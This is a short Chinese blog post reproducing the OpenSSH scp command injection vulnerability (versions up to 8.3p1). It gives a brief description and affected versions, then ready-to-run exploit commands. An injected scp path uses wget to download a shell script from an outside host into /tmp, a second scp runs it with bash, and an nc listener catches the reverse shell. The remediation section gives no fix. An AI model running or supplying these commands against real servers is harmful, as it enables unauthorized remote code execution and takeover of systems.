- A+
所属分类:漏洞复现
0x01 漏洞描述
OpenSSH 8.3 p1及之前版本中的scp的scp.c文件存在命令注入漏洞。该漏洞源于外部输入数据构造可执行命令过程中,未正确过滤其中的特殊字符导致。攻击者可利用该漏洞执行非法命令。
OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。
0x02 影响版本
1 |
<=openssh-8.3p1 |
0x03 漏洞复现
环境:
ssh版本
服务器不允许远程登录
远程代码执行
1 2 |
scp 10w.dict root@192.168.1.113:'<code>wget https://dyblogs.cn/shell.txt -O /tmp/shell.txt </code>/1.txt' scp 10w.dict root@192.168.1.113:'<code>bash /tmp/shell.txt </code>/1.txt' |
反弹shell
1 |
nc -lnvp 6666 |
0x04 修复建议
目前厂商暂未发布修复措施解决此安全问题,请密切关注厂商主页获取解决办法:
- 我的微信
- 这是我的微信扫一扫
- 我的微信公众号
- 我的微信公众号扫一扫